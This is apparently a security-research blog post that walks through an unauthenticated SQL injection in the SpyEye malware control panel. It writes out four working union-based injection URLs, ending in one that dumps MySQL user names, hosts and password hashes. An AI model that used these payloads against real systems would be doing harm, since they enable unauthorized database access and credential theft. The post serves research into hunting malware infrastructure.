The world has changed dramatically with the evolution of malware. A similar set of vulnerabilities ( web attacks specific) such as SQL injection can be used to compromise the malware driven server. Some time ago, we talked about Blind SQL Injection in SpyEye Version 1.0 in which we presented about the vulnerability in the SpyEye code. Since then we dint get the time to present it as a complete case study. In this post, we are going to talk about the step by step approach to compromise the SpyEye database server. One can do lot of different attacks such as Local File Inclusion (LFI) there by reading the configuration credentials. However, we are sticking to the SQL injection to show how well we can inject and take control of malware server.
The vulnerability affects the latest version of spyeye (1.3) within "frmcp0/frm_findrep_sub2.php?id=". The good point is this SQL injection works right on the fly without any authentication.
Injection 1: Version Disclosure - http://spyeye_domain.com/frmcp /frm_findrep_sub2.php?id=-999999%20union%20all%20select%200x31,concat(0x7e,0x27,version()
,0x27,0x7e),0x33,0x34,0x35,0x36,0x37--+
You can see the injection is occurring in the title field. This suggests that our payload is getting injected. On similar testing pattern, let's perform some other set of injections as presented below
Injection 2: Database Verification - http://spyeye_domain.com/frmcp0/frm_findrep_sub2.php?id=-999999%20union%20all%20select%200x31,concat(0x7e,
0x27,database(),0x27,0x7e),0x33,0x34,0x35,0x36,0x37--+
Injection 3: Information Schema Disclosure -
http://spyeye_domain.com/frmcp0/frm_findrep_sub2.php?id=-999999 union all select 0x31,concat(0x7e,0x27,group_concat(column_name),0x27,0x7e),0x33,0x34,0x35,0x36,0x37 from `information_schema`.columns where table_schema=0x6d7973716c and table_name=0x75736572--+
The disclosed schema is as follows
Host,User,Password,Select_priv,Insert_priv,Update_priv,Delete_priv,
Create_priv,Drop_priv,Reload_priv,Shutdown_priv,Process_priv,File_priv,
Grant_priv,References_priv,Index_priv,Alter_priv,Show_db_priv,Super_priv,
Create_tmp_table_priv,Lock_tables_priv,Execute_priv,Repl_slave_priv,
Repl_client_priv,Create_view_priv,Show_view_priv,Create_routine_priv,
Alter_routine_priv,Create_user_priv,ssl_type,ssl_cipher,x509_issuer,
x509_subject,max_questions,max_updates,max_connections,max_user_connections
Injection 4: Pwning MySQL Database - http://spyeye_domain.com/frmcp0/frm_findrep_sub2.php?id=-999999 union all select 0x31,concat(0x7e,0x27,user.User,0x3a,user.Host,0x3a,user.Password,0x27,0x7e)
,0x33,0x34,0x35,0x36,0x37 from `mysql`.user limit 0,1--+
So this discussion has proved the fact that security vulnerabilities can be fruitful in hunting back malware. We will be giving a detailed talk on Hunting Web Malware at OWASP and Hacker Halted this year.
OWASP AppSec USA - http://www.appsecusa.org/talks.html#goodhacker
Hacker Halted : http://www.hackerhalted.com/2011/Presenters.aspx
Stay tuned.
